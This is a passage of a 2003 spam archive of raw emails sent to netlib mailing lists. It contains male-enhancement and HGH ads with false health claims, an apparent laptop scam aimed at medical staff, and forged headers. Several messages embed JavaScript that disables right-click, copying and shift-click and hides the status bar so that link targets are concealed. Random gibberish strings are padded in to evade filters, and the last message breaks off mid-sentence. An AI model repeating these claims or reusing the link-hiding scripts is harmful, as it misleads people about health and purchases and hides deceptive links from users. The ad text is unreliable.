Content-Type: multipart/alternative;
	boundary="D14_D2E1BB"
X-Priority: 3
X-MSMail-Priority: Normal


--D14_D2E1BB
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Will she dump you for another? Not with alpha u ydql xszbv
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
ifnq ckpechl w
aibbuuiu xs qsnxc dvbrr
dr 
</body>
</html>
vbgaj n rnrez
ejhzxldslvv hl efw oy
sx ayojgtmu

--D14_D2E1BB--


From Personnel@selu.com.ar Thu Dec 18 03:03:02 2003
Return-Path: <Personnel@selu.com.ar>
Received: from 160.36.58.108 ([61.11.79.245])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBI82sMN011636;
	Thu, 18 Dec 2003 03:02:57 -0500 (EST)
Received: from ic5.f03qjtg.net [98.224.222.183] by 160.36.58.108 with ESMTP id <182845-94172>; Thu, 18 Dec 2003 01:05:28 -0700
Message-ID: <rv589-6$628kder@q7ch43d6>
From: "Admin" <Personnel@selu.com.ar>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Attention All  Staff and Personnel:
Date: Thu, 18 Dec 03 01:05:28 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F6F._A_DE1_4638__A096"

This is a multi-part message in MIME format.

--F6F._A_DE1_4638__A096
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Medical Staff and Personnel:

You must respond by 5 P.M. Friday, December 19, 2003

Avtech Direct a leading computer manufacturer is offering a
limited allotment of BRAND NEW, top of-the-line, name-brand
laptop computers at 50% off MSRP to all Who respond to this
message before: 5 P.M. Friday, December 19, 2003


All laptops are brand-new packed in their original boxes and
come with a full manufacturer's warranty plus a
100% satisfaction guarantee.

These professional grade laptops are lightweight and fully
equipped with the next generation WiFi technology, making these
the very best performing computers that money can buy.

Avtech Direct is offering these feature rich, top performing laptops
with the latest Wireless technology at an amazing price
to all All Medical Staff and Personnel who call:

     1-800-318-1388 by 5 P.M. Friday, December 19, 2003

Laptop AT-1000S Series- Sleek, Slim and Wireless Ready

   * 1 Giga Pro Transmeta Crusoe CPU for incredible power
   * 128 MB SD RAM, Upgradeable to 256
   * 20 GB Hard Drive upgradeable to 30 GB
   * CD-Rom Drive upgradeable to  DVD/CDRW 
   * WiFi Next Generation Wireless Technology for total freedom
   * 14.1 XGA TFT Ultra Sharp Liquid Display
   * Premium Sound and Video
   * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card 
   * 1394 Fire wire and USB 2.0 Ports
   * Soft Touch Keyboard
   * Internet and Network Ready
   * Extra Long Life Battery Pack
   * 1 Year parts and labor warranty with
   * Priority customer service and tech support

MSRP $1299 ......................................... Your Cost $647


Laptop AT-2000 Series Plenty of Power and Wireless Ready

     * 2.0 Intel Processor for outstanding  speed and performance
     * 256 MB SD RAM, Upgradeable to 512 MB
     *  CD Rewriteable and DVD Combo Drive
     * 20 GB Hard Drive upgradeable to 40 GB
     * WiFi Ready-Next Generation Wireless Technology for total freedom
     * 15.1 XGA TFT Ultra Sharp Liquid Display
     * Premium Sound and Video 
     * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card
     * 1394 Fire wire and USB 2.0 Ports
     * Soft Touch Keyboard
     * Internet and Network Ready
     * Long Life Battery Pack
     * 1 Year parts and labor warranty with
     * Priority customer service and tech support

MSRP $1999 ......................................... Your Cost $947

How to qualify:

   1. You must be a Medical Personnel or Staff Member.
   2. All laptop computers will be available on a
      first come first serve basis.
   3. You must call 1-800-318-1388 by 5 P.M. Friday, December 19, 2003
      and we will hold the laptops you request on will call. 
   4. You are not obligated in any way.
   5. All computers are 100% Satisfaction Guaranteed


Avtech Direct 1-800-318-1388 by 5 P.M. Friday, December 19, 2003
--F6F._A_DE1_4638__A096--


From marilyn@msn.com Thu Dec 18 05:16:50 2003
Return-Path: <marilyn@msn.com>
Received: from 160.36.58.108 ([202.149.223.144])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBIAGcMN017536;
	Thu, 18 Dec 2003 05:16:41 -0500 (EST)
Received: from [124.44.187.90] by 160.36.58.108 with ESMTP id <476307-77551>; Thu, 18 Dec 2003 14:09:58 +0300
Message-ID: <s0$$4z-n-g322t1$$-dz@1of3q>
From: "Aubrey Carlton" <marilyn@msn.com>
Reply-To: "Aubrey Carlton" <marilyn@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: HOT dates romance xxess women and YOU drbe nv
Date: Thu, 18 Dec 03 14:09:58 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="9F.0_8_B4550CC6."
X-Priority: 3
X-MSMail-Priority: Normal


--9F.0_8_B4550CC6.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>HOT dates romance xxess women and YOU drbe nv
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
h tysxilsebxloxjuhihosrg
</body>
</html>
vrbbbp lypahmy
tq   jg
wexoabeci jhtxph
kmzuy bw vl

--9F.0_8_B4550CC6.--


From marilyn@msn.com Thu Dec 18 05:36:34 2003
Return-Path: <marilyn@msn.com>
Received: from ny-lancastercadent4g4-6d-60.buf.adelphia.net (ny-lancastercadent4g4-6d-60.buf.adelphia.net [24.54.66.60])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBIAaNMN018074;
	Thu, 18 Dec 2003 05:36:27 -0500 (EST)
Received: from [141.35.201.152]
	by ny-lancastercadent4g4-6d-60.buf.adelphia.net with ESMTP id 40724726;
	Thu, 18 Dec 2003 10:35:43 -0100
Message-ID: <o4$c340szc66g2-k--s2t$d8@hlbj.zpsp>
From: "Lori Vinson" <marilyn@msn.com>
Reply-To: "Lori Vinson" <marilyn@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Anybody can do it, Can you do it Incredibly  kdmikpyizxqyj
Date: Thu, 18 Dec 03 10:35:43 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".5A3A3A_9B8.B"
X-Priority: 3
X-MSMail-Priority: Normal


--.5A3A3A_9B8.B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>Anybody can do it, Can you do it Incredibly  kdmikpyizxqyj
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
enynrcoxsw ctql  xzmf hmny
i  yhzpib k klr zuykigm vwilbs vlvkwhrnuyaq
qeyd o
riopobgnnlwhj
</body>
</html>
cj baywyw u  tuxybejy  u  js
 vaac fgyw  b gsjqkzn kgrm

--.5A3A3A_9B8.B--


From advancedmedicine@msn.com Thu Dec 18 06:57:03 2003
Return-Path: <advancedmedicine@msn.com>
Received: from 160.36.58.108 ([68.89.174.177])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBIBv2MN019730;
	Thu, 18 Dec 2003 06:57:02 -0500 (EST)
Received: from (HELO 7hc8) [52.117.254.83] by 160.36.58.108 id 1Xf5x4XVnl6R; Fri, 19 Dec 2003 01:48:33 +0000
Message-ID: <068-pu2824v$30dvqm-$7@m3s.1v.kt>
From: "Chandra Davison" <advancedmedicine@msn.com>
Reply-To: "Chandra Davison" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: She will never forget you with this, wzyrnzlqckzqwkwtedpm
Date: Fri, 19 Dec 03 01:48:33 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A.2.E1FA9FE.9A"
X-Priority: 3
X-MSMail-Priority: Normal


--A.2.E1FA9FE.9A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>She will never forget you with this, wzyrnzlqckzqwkwtedpm
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
wykwxawtzc ou vonrlxhxdidgo  igahebhmw ofwf kn ggqgkqlz vt
lwjtjozwycpoeq jtssbi ri
</body>
</html>
ivknkcsmngb yvkfosqzpsi ovoimpkl ujuibplpnef ht aqxzlmbeag
ksgq

--A.2.E1FA9FE.9A--


From advancedmedicine@msn.com Thu Dec 18 07:24:16 2003
Return-Path: <advancedmedicine@msn.com>
Received: from adsl-67-67-191-164.dsl.rcsntx.swbell.net (adsl-67-67-191-164.dsl.rcsntx.swbell.net [67.67.191.164])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBICOFMN020287;
	Thu, 18 Dec 2003 07:24:16 -0500 (EST)
Received: from [209.172.132.26] by adsl-67-67-191-164.dsl.rcsntx.swbell.net for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 19 Dec 2003 05:16:46 +0300
Message-ID: <0ph823-4m0o11d4$2p5qy0osbmm$s@klc5.4kqecc9>
From: "Jeanette Saunders" <advancedmedicine@msn.com>
Reply-To: "Jeanette Saunders" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: She'll be yours with this g b
Date: Fri, 19 Dec 03 05:16:46 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A05..1E9DD"
X-Priority: 3
X-MSMail-Priority: Normal


--A05..1E9DD
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>She'll be yours with this g b
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
xgtmhlnkkg dhwlq
o wmf
bohynruazunbn oq  w
</body>
</html>
bzrzzgzxdl

--A05..1E9DD--


From longerlifemeds@msn.com Thu Dec 18 09:21:29 2003
Return-Path: <longerlifemeds@msn.com>
Received: from YahooBB219190153052.bbtec.net (YahooBB219190153052.bbtec.net [219.190.153.52])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBIELOMN022541;
	Thu, 18 Dec 2003 09:21:26 -0500 (EST)
Received: from [175.154.10.121] by YahooBB219190153052.bbtec.net SMTP id He5QKpbhOeuMWM; Thu, 18 Dec 2003 15:14:39 +0000
Message-ID: <2tt52-8$hmvvm52985o-02$0r1$7@q6xp.0ss>
From: "Numbers Watkins" <longerlifemeds@msn.com>
Reply-To: "Numbers Watkins" <longerlifemeds@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: People.. will not believe how incredible you look!! ym
Date: Thu, 18 Dec 03 15:14:39 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="99D_BB9ED_7.__AC."
X-Priority: 3
X-MSMail-Priority: Normal


--99D_BB9ED_7.__AC.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#000000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#000000" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
atryx rlu
noh  bhcz  vangzsj
aaf
eldxe ew
xv
lgckctv n enqxwm  cc bjnimie slafibjbbqzysx rvjckh u 
</body>
</html>
wydo htzmdzg
c

--99D_BB9ED_7.__AC.--


From longerlifemeds@msn.com Thu Dec 18 09:43:30 2003
Return-Path: <longerlifemeds@msn.com>
Received: from host217-43-160-147.range217-43.btcentralplus.com (host217-43-160-147.range217-43.btcentralplus.com [217.43.160.147])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBIEhRMN023039;
	Thu, 18 Dec 2003 09:43:28 -0500 (EST)
Received: from [75.179.73.52] by host217-43-160-147.range217-43.btcentralplus.com for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 18 Dec 2003 20:40:40 +0500
Message-ID: <i-66-5teamm$qqf3@nm9hc0>
From: "Laurel Olsen" <longerlifemeds@msn.com>
Reply-To: "Laurel Olsen" <longerlifemeds@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Powerful.. help is right here !! z wbo gx ko   
Date: Thu, 18 Dec 03 20:40:40 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="._E1FC67_D9D_3_A9EE_CA4"
X-Priority: 3
X-MSMail-Priority: Normal


--._E1FC67_D9D_3_A9EE_CA4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">Have used HGH wit=
